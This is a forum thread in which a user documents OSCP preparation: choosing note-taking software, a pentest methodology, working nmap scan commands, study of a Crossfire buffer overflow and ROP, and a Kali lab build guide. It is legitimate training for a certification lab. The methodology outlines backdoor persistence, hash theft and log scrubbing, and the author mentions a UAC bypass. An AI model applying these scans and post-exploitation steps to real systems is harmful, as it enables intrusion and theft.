+ Reply to Thread
Page 1 of 5 1 2345 Last
Results 1 to 25 of 120
  1. Member
    Join Date
    May 2015
    Posts
    79
    #1

    Cool OSCP - JollyFrogs' tale

    I'll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

    My basic plan is as follows:
    - Read as many forums and blogs as I can - This task is complete
    - Utilize the resources from those forums and blogs to prepare - This is where I am now
    - After preparing, I will sign up for the OSCP study and maximize my lab time

    I will dedicate 2-3 hours per day plus 8-10 in the weekends to studies. I'll sign up for 3 months lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that's an average of 6 hours per machine owned. I never expected this to be easy

    My preparation tasks are proceeding well. I will detail more about my preparations in days to come.
    Last edited by JollyFrogs; 05-11-2015 at 08:38 AM. Reason: Forum was not saving my formatting. Solution: Allow "yui.yahooapis.com" in ScriptSafe in Chrome :)
    Reply With Quote Quote  

  2. SS -->
  3. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #2
    Good luck!
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  4. Member
    Join Date
    May 2015
    Posts
    79
    #3
    I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read "wanted" and not "needed") to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufference, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka "owning" or "pwning") each and every machine that was presented to me.


    After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I've read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me, I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months, she is very supportive.


    One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called "KeepNote", but me being me, I decided to make up my own mind. So I spent two full days trying various notekeeping softwares. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:
    - Hierarchical (tree with sub branches and "leaves" aka pages)
    - Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
    - NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
    - Export into .PDF or .DOC format so I didn't have to rewrite my report after taking the notes


    CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of addons and plugins and it could do what I wanted although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can't save its output in .PDF format. But when I thought about that requirement a bit more, it didn't make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.


    I've started using KeepNote now and I'm very satisfied with the decision to use KeepNote, having tried many other tools. I'm writing this note in KeepNote!


    Tips on using KeepNote:
    - Take a screenshot by pressing CTRL-INSERT.
    - Run KeepNote off an SSD hard drive otherwise it can be sluggish.
    - If possible, don't attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
    - Spend a few hours setting up your folder structure.
    - Make frequent backups. I backup my KeepNote notebook every 3-4 hours.
    Reply With Quote Quote  

  5. Audentis Fortuna Iuvat veritas_libertas's Avatar
    Join Date
    Feb 2009
    Posts
    5,652

    Certifications
    eCPPT, GPEN, GWAPT, GCIH, CISSP, CCNA (expired), MCTS
    #4
    Sounds like fun. I'm hoping to get to the OSCP eventually. Right now I'm slowly working through eJPT and then eCPPT. If you want to be "elite" you could use VIM for note keeping

    Good luck with the OSCP!
    Currently working on: Resting
    Reply With Quote Quote  

  6. Member
    Join Date
    Nov 2014
    Posts
    77

    Certifications
    CISSP, GSEC, GCED, GWAPT, GISP
    #5
    Thank you for sharing your thoughts on tools for note-keeping. I am working on enhancing my skill set and doing some advance prep work, before beginning my OSCP journey. My plan for this summer is to learn python, develop a greater comfort level with Kali Linux, and do some self-study to refresh my basic pentesting knowledge, before registering for PWK in the fall.

    One of the things I had on my checklist was to find a tool that would work well for organizing and managing extensive sets of notes. Your comments will be very useful when I am choosing a tool for notes.

    Thanks again!
    ~justjen
    Last edited by justjen; 05-17-2015 at 06:40 PM.
    Reply With Quote Quote  

  7. Member
    Join Date
    May 2015
    Posts
    79
    #6
    Another week has passed, and I'm having a blast with the OSCP preparations so far. I haven't even registered for the course yet, as I am still sharpening my axe. I've started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible, I've started scripting 1) and 3)


    The system I came up with (which I will probably tune once I get started in the labs) is as follows:


    1) Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS's and possible "sweet spots" to start the exploitation process. Only the top 10-20 ports are scanned but we're scanning the whole /24 range.

    2) Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.

    3) Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions etc

    4) Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and force entry in to the remote system. This includes remote "point-and-shoot-instant-system-access", FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc

    5) Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions etc

    6) Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account, this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc

    7) Persistance: This is where we install backdoors to secure our access. We don't want to have to go through the whole steps above again. Things like adding local administrator accounts, setting service to start automatic on boot, putting a pinhole in the firewall service, etc

    8) Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationship between this host and other hosts, etc

    9) Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors, essentially we "wipe our fingerprints" from the system

    10) Update maps and diagrams, and move to another system on point 3)
    Last edited by JollyFrogs; 05-22-2015 at 08:13 AM.
    Reply With Quote Quote  

  8. Senior Member wd40's Avatar
    Join Date
    May 2007
    Location
    Bahrain
    Posts
    903

    Certifications
    CISA, eJPT, CompTIA x 6, MCP, MCTS
    #7
    Great detailed post, Thanks.

    Please continue posting, I am sure people will be following your posts.

    I wish I had the willpower to do this ..
    Reply With Quote Quote  

  9. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #8
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  10. Senior Member Mitechniq's Avatar
    Join Date
    Jun 2012
    Posts
    262

    Certifications
    CCNA, GIAC G2700, VCP5-DCV C|EH, ISC2 CISSP, AWS-PSA (Most have Expired)
    #9
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.
    Reply With Quote Quote  

  11. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #10
    A part of the course is bash scripting. I did the same thing during my lab time. Scripting out a scan will allow you to automate a lot of of stuff, its very useful.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/
    Reply With Quote Quote  

  12. Senior Member
    Join Date
    Oct 2013
    Location
    Washington DC
    Posts
    498

    Certifications
    OSCP, eMAPT, eWPT, CISSP, GPEN, GWAPT, GCIH, GCIA, GSEC, CEH, CNDA, ECSA, CHFI, Sec+, Net+
    #11
    Quote Originally Posted by Mitechniq View Post
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.
    You are exactly right. There is absolutely no reason to automate discovery during the PWK course. Just use Nmap.

    For a lot of people though, OSCP is one of their first encounters with scripting and automation. The course demonstrates basic automation within the context of scanning and people often tend to get the idea that they need to do this, when in fact, the course is really just trying to demonstrate automation fundamentals.

    I've literally seen people get so wrapped up in this part of the course that they completely forget the objective is to start popping boxes.
    Reply With Quote Quote  

  13. Member
    Join Date
    May 2015
    Posts
    79
    #12
    Quote Originally Posted by Mitechniq View Post
    I believe I am missing something here, why are you going through the effort of building out your own scripts when Kali has all the modules and tools to Pen-Test. Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it.
    I don't believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

    I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

    I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

    I seek not just to admire the magic, but to understand and master it.

    Quote Originally Posted by MrAgent View Post
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
    Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

    1) Start with a recon scan of the network to get an idea of the network:
    nmap -Pn -F -sSU -T5 -oX /root/10.1.1.1-254.xml 10.1.1.1-254 | grep -v 'filtered|closed' > /root/quick_recon.txt

    2) Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
    nmap -Pn -sSU -T4 -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110 | grep -v 'filtered|closed'

    3) Then run an intensive scan on the open ports per host, TCP and UDP separately to speed scan up:
    tcp: nmap -nvv -Pn -sSV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"tcp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-tcp.xml 10.1.1.110
    udp: nmap -nvv -Pn -sUV -T1 -p$(cat 10.1.1.110.xml | grep portid | grep protocol=\"udp\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-udp.xml 10.1.1.110

    Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.
    Last edited by JollyFrogs; 05-23-2015 at 05:01 AM. Reason: spacing removed from code
    Reply With Quote Quote  

  14. Member
    Join Date
    May 2015
    Posts
    79
    #13
    I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let's go back in time! Keep in mind, I haven't yet started the course, this is all part of my preparations to maximize lab time

    In the OSCP Syllabus (available here: https://www.offensive-security.com/d...-with-kali.pdf) a "Crossfire" application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in c and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the "setup sound" module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use the evans debugger which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt... and nothing happened!

    In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the sploit. EDB breaked out at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling "Linux memory segmentation fault" which gave too many results, I then searched "linux segmentation fault exploit" and found c - Exploiting buffer overflow leads to segfault - Information Security Stack Exchange which hints toward a feature called ASLR and "-z execstack". Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka "NX bit", aka "DX", aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command "dmesg | grep --color '[NX|DX]*protection'" and indeed, NX was enabled. Further investigation into the possibility to disable NX bit (including via my virtualbox option "Enable PAE/NX" would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network in which case the exercise would not be required.

    DEP/NX works very simply: If memory is R/W, then it can't be X. If memory is R/X, then it can't be W. So if we can WRITE to the memory (stack) then we can't EXECUTE it. (hence the segmentation fault). It we can EXECUTE it, we can't WRITE to it.

    So I started looking into the option to exploit this "NX bit" and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any "RET" instruction in programs look up the original source address which they get from the ESP, not the EIP. So while normally we'd try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

    Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc
    ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

    So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can't WRITE the instructions we're using, but we can EXECUTE them (and as such, DEP allows us to execute).

    And that's where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I'll keep you posted!
    Reply With Quote Quote  

  15. Senior Member
    Join Date
    Oct 2012
    Location
    Lexington, KY
    Posts
    534

    Certifications
    CISSP, GMON
    #14
    You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.
    Reply With Quote Quote  

  16. Member
    Join Date
    May 2015
    Posts
    79
    #15
    Quote Originally Posted by wes allen View Post
    You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.
    Hi Wes,

    Thanks. The current exploit I'm writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I've decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.
    Reply With Quote Quote  

  17. Member
    Join Date
    May 2015
    Posts
    79
    #16
    Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

    So here is a tip:
    When downloading the Kali image from the offensive security site (https://www.offensive-security.com/k...mage-download/) make sure you choose the image called "Kali 32 bit VM" and not the image called "Kali 32 bit PAE VM" like I did haha, I learnt today that sometimes, more is not better

    I did learn a lot by using the PAE image:
    - Built a working ROP chain
    - Use gbd and edb debuggers more proficiently
    - Write scripts more efficiently
    - Found lots of interesting websites in the process
    - Got better at python scripting
    - Learnt some really cool assembly tricks
    - Learnt to decompile shellcode to assembly code to analyze what it does
    - Learnt to write my own shellcode in assembly, compile it and run it!
    - including my own first assembly reverse shell

    But, I must keep on track, it's time to move on to web application vulnerabilities and SQL injection, woop woop!
    Reply With Quote Quote  

  18. Member
    Join Date
    May 2015
    Posts
    79
    #17
    JollyFrogs, Brisbane Australia
    Version: 0.1
    Revision date: 26 May 2015


    Welcome message
    ---------------
    This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.
    Note: This guide is written for Windows 7 64-bit Host OS, I strongly advise using this operating system to install your OSCP machines.


    This is the hardware that I used to set up this lab, if you don't have similar or better hardware, I advise investing a little in getting good hardware:
    Asus Maximus Hero VI motherboard
    32GB memory (Kingston)
    Intel 120GB SSD
    Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
    Windows 7 64-bit (6.1.7601 SP1)


    I have created this lab using my own network IP addressing, details of which are:
    (All subnet masks in the LAN are /24 aka 255.255.255.0)


    The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet:
    10.1.1.1 = My physical internet router (a Ubiquity ERLite3) which acts as my default gateway and DNS server.
    10.1.1.200 = My main PC LAN interface, we will lose this IP when we configure a BRIDGE interface later


    The following IP addresses are used for various components that are added during this guide:
    10.1.1.200 = My main PC BRIDGE interface
    10.1.1.199 = Kali 1.1.0a VirtualBox VM


    You have two options when following this guide:
    1) Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN.
    or
    2) Renumber your internal network IP addressing to use the same IP addresses as in this guide.


    You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


    ------------
    Preparations
    ------------


    Note: The fun part begins in the section called "After Reboot", but don't skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven't made a typo.


    IMPORTANT NOTE: I don't isolate hosts on my network. This is a very *UNSAFE* practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquity ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don't feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via "Host-only adapters".


    Get required files:
    --------------------
    VirtualBox 4.3.26 R98988:
    http://dlc-cdn.sun.com/virtualbox/4....-98988-Win.exe


    Kali 1.1.0a (kali-linux-1.1.0a-i486.iso):
    http://images.offensive-security.com...1.0a-vm-486.7z
    NOTE: For the OSCP exam, you'll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.
    NOTE: Don't get the "PAE" version of Kali linux! We'll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard


    Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network
    -------------------------------------------------------------------------------------------------------
    - Click the Windows Start button (bottom left)
    - type "cmd" but do not press enter
    - Right-click "cmd.exe" (top of start bar menu) and select "run as Administrator" (Click "Yes" to confirm)
    Note: In the black cmd.exe screen:
    - type "hdwwiz.exe" and press Enter
    Note: the "Add Hardware Wizard" window opens
    - Click "Next"
    - Select “Install the hardware that I manually select from a list (Advanced)” and click "Next"
    - Select “Network adapters” and click "Next"
    - Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click "Next"
    - Click "Next" to install the loopback adapter
    - Click "Finish" to close the "Add Hardware" screen
    Note: We're still in the black cmd.exe screen:
    - type "ncpa.cpl" and press Enter
    Note: the "Network Connections" window opens
    - Right-click the adapter "Microsoft Loopback Adapter" and select "Rename"
    - Rename the Loopback Adapter to "LOOPBACK" to remove confusion later
    - Right-click your wired network adapter and select "Rename"
    - Rename your wired network adapter to "LAN"
    - Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
    - Right click on the LOOPBACK while both adapters are highlighted and select "Bridge Connections"
    Note: This will create a new network card called "Network Bridge"
    - Right-click your new bridge adapter and select "Rename"
    - Rename your wired network adapter to "BRIDGE"
    - Right-click "BRIDGE" and select "Properties"
    In the "BRIDGE Properties" screen:
    - Left-click (this highlights) "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties"
    In the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen:
    In the "General" tab at the top:
    Select "Use the following IP address"
    IP address: 10.1.1.200
    Subnet mask: 255.255.255.0
    Default gateway: 10.1.1.1
    Preferred DNS server: 10.1.1.1
    Alternate DNS server: <leave blank>
    - Click "OK" to close the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen
    - Click "Close" to close the "BRIDGE Properties" screen
    Note: We're still in the black cmd.exe screen:
    - type "ping www.google.com"
    Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter
    Note: Do not proceed if you do not have internet connectivity
    - Close the "Command Prompt" black cmd.exe screen


    Install VirtualBox
    ------------------
    Run "C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe"
    Note: Click "Yes" on any opening warnings
    - Click "Next"
    - Click "Next" (install all options)
    - Click "Next"
    - Click "Yes"
    - Click "Install" to start the installation
    - Click "Yes" at the UAC warning screen
    - Click "Install" to install the device driver
    - Click "Finish"


    Install Kali 1.1.0a on VirtualBox 4.3.26 R98988
    --------------------------------------------
    Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\


    Start "Oracle VM VirtualBox"
    - Click "New"
    Name: Kali110a-32bit-NOPAE
    Type: Linux
    Version: Debian (32 bit)
    - Click "Next"
    MB: 1024
    - Click "Next"
    Select "Use an existing virtual hard drive file"
    - Click the little yellow folder with the green arrow
    Choose: "E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk"
    - Click "Create"
    NOTE: A new icon "Kali110a-32bit-NOPAE" was created in your "Oracle VM VirtualBox Manager"


    NOTE: Leave settings at default unless otherwise stated below
    NOTE: I'm showing some important settings even though they are defaults, in case the defaults change some day
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Settings..."
    General - Advanced - Shared Clipboard: "Bidirectional"
    System - Motherboard - Floppy: Untick
    System - Processor - Enable PAE/NX: Make sure this is NOT ticked
    Audio - Enable Audio: Untick
    Network - Adapter 1 - Enable Network Adapter: Tick
    Network - Adapter 1 - Attached to: "Bridged Adapter"
    Network - Adapter 1 - Name: "MAC Bridge Miniport"
    Network - Adapter 1 - Advanced - Adapter Type: "Intel PRO/1000 MT Desktop (82540EM)"
    Network - Adapter 1 - Advanced - Promiscuous Mode: Allow All
    Network - Adapter 1 - Advanced - MAC Address: 444444444444
    NOTE: Set the MAC address to an easily identifiable MAC
    Network - Adapter 1 - Advanced - Cable Connected: Tick
    - Click "OK" to close the "Kali110a-32bit-NOPAE - Settings" screen
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Start"


    Note: A new screen "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" opens and the Kali Linux installer will boot.


    In the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    Your new Kali installation will boot, let it time out for 5s in the GRUB menu
    You will be presented with the Kali login screen
    Click anywhere in the screen with your mouse
    Note: To unlock the mouse from Virtualbox, press the rightmost CTRL key on your keyboard
    - Click on "Other..."
    - Username: root <enter>
    - Password: toor <enter>
    Note: You will be presented a desktop environment.
    Note: Do *NOT* update Kali linux, we'll make a backup first so you can go back to a clean Kali installation


    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@Kali110a:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# ifconfig
    Note: You should see eth0 has an IP address
    root@kali:~# ping 8.8.8.8
    Note: You should see replies from 8.8.8.8
    - Close the "root@kali:~" terminal window
    Press the right-most CTRL key on your keyboard to unlock the mouse
    In the top menu bar of the "Kali110a-32bit-NOPAE [Running] - Oracle VM VirtualBox" screen:
    - Click "Devices" -> "Insert Guest Additions CD Image..."
    - Click "Cancel" in your Kali desktop popup to dismiss the autorun popup
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# cp /media/cdrom/VBoxLinuxAdditions.run .
    root@kali:~# ./VBoxLinuxAdditions.run
    Note: VirtualBox Linux Guest additions will now install
    root@kali:~# reboot
    Note: After rebooting you will notice that your mouse magically enters and exits the VM. This is because of the VirtualBox Additions!
    - Press <Enter> on "Other..."
    Username: root <enter>
    Password: kali <enter>
    - Right-click "VBOXADDITIONS_4.3.18_96516" and click "Eject" near the bottom
    Note: Now that you have installed the VirtualBox additions to Kali, you can:
    - Seamlessly move the mouse in and out of the virtual machine
    - Copy/Paste to and from the virtual machine using clipboard
    - Share folders between the virtual machine guest and your host machine
    In the top of the screen, click the black >_ icon ("terminal")
    In the "root@kali:~" terminal window type (omit "root@kali:~# "):
    root@kali:~# shutdown -h now
    Note: Now that we have a good clean install of Linux Kali, we'll back it up so you can restore a clean install in minutes if required


    In the "Oracle VM VirtualBox Manager" window:
    - Click "File" -> "Export Appliance..."
    - Left-click "Kali110a-32bit-NOPAE" to highlight it
    - Click "Next >"
    File: "D:\STUDY\OSCP\VIRTUAL_MACHINES\VANILLA_BACKUPS\Ka li110a-32bit-NOPAE.ova"
    Format: "OVF 1.0"
    Write Manifest file: Tick
    - Click "Next >"
    - Click "Export"
    Note: The export can take quite a while
    Note: After the export finishes, we have completed the installation of Kali in your network!
    Reply With Quote Quote  

  19. Member
    Join Date
    May 2015
    Posts
    79
    #18
    I've focused on the Windows platform in recent days. I managed to grab my notebook and took notes while falling down the rabbit hole. I've counted 493 pages in my notebook so far, of which about half is scripts and text.


    Over the last few days I've learnt/done:
    - Default Windows UAC settings are easy to bypass as long as the setting is not set to "Always prompt me when programs try to run with elevated privileges". By default, Windows 7 has this setting disabled. I've coded several pieces of code that allow me to run my own programs without being prompted by UAC. I'm not sure if I will need this functionality in the labs, but if I do, it will save me some research and compilation.
    - A properly built and secured Windows machine is not trivial to exploit.
    - I've been building a list of "interesting files" as part of my ever growing "loot list". I'll be enumerating 3 times per host: The first time is during remote enumeration, the second time I will enumerate as a low privilege user, the third time I will enumerate as the system/root account. Literally "Enumerate, Enumerate and Enumerate some more". The enumeration scripts for the local user and root user are very similar: After all, I don't know which files I will have access to under either account so I have to run all checks in my loot list, without prejudice. Would I expect a admin to give world readable permissions to the shadow file? No, but someone else might! For instance, a badly configured machine might allow access to the SAM database as a low privileged user, so any loot that would be interesting to run under the root account would be equally (if not more) interesting under the low privilege account. Similarly, some files might be hidden to my low privilege user which will only be reachable under the system/root account.
    - I worked on my windows one-liner command skills, learnt a lot
    - I created a tool-set for downloading files to windows machines using various techniques for different platforms, using only default tools available on the target host. I would imagine that on most windows machines, tools like nc.exe won't be available so this will provide me with an easy way to transfer the files without requiring additional tools on the windows machine.
    - I've learnt that a Philips HD9240 Airfryer makes delicious, crispy fries! (I bought one last week)


    Over the last few weeks I've come to understand the importance of having a solid documenting methodology. I understand now just how easy it is to get lost in all the information out there. Spending a few days early on, perfecting my documentation system has been critical in keeping my gathered information categorized. I'm using the same major folder structure a per my post #6, and with almost 500 pages of documentation it's still easy to find information.


    I still have much to do before I can consider myself ready on the windows platform: Pre-compiling exploits, scripting, privilege escalation to name a few big ones. And that's just the Windows side of things, after Windows there is Linux, databases, web-servers etc... I am starting to understand how people can get bogged down in their progress.
    Last edited by JollyFrogs; 05-31-2015 at 05:44 AM.
    Reply With Quote Quote  

  20. Member
    Join Date
    May 2015
    Posts
    79
    #19
    It's Saturday and another week has flown by. I've had to burn the midnight oil at work and I haven't been able to put in as much study time as I wanted. I did study every day though, just not the 3 hours I initially planned. I've modified my attack vector slightly, including public research in the passive recon step, and creating a new step for social engineering and client-side attacks. I still like the idea of having sub-folders with the various platforms so I've left that bit untouched. I started attaching my compiled exploits into my notebook, organized by platform. I haven't had a crash yet but I ensure I keep saving the notebook every 5-10 minutes, with a full notebook backup every 2-3 hours and at the end of each day. I decided to zip the exploits before attaching them, which allows me to double-click on an entry in my KeepNote notebook which will open the contents of the zip file (the exploit) in my 7-zip explorer-like window. I wasn't keen on double-clicking on executable exploits in KeepNote on my day-to-day desktop machine, even though I know they won't harm my machine since I coded them. I only pre-compiled exploits with bind shells privilege escalation exploits, and I ensured that all my exploits have easily swappable shell-codes. I have kept the sources of my exploits with detailed guides on how to compile on Kali for when I need reverse shells. I have come up with a naming convention which allows me to quickly search through the ever growing list of exploits and source codes I'm hoarding. Every script and piece of code starts with a note on how to compile, how to use and how to modify.

    Here are some of my Windows one-liners, these two methods can be used for any command that requires multiple lines, for instance when creating an FTP script or creating a visual basic script to download a file:

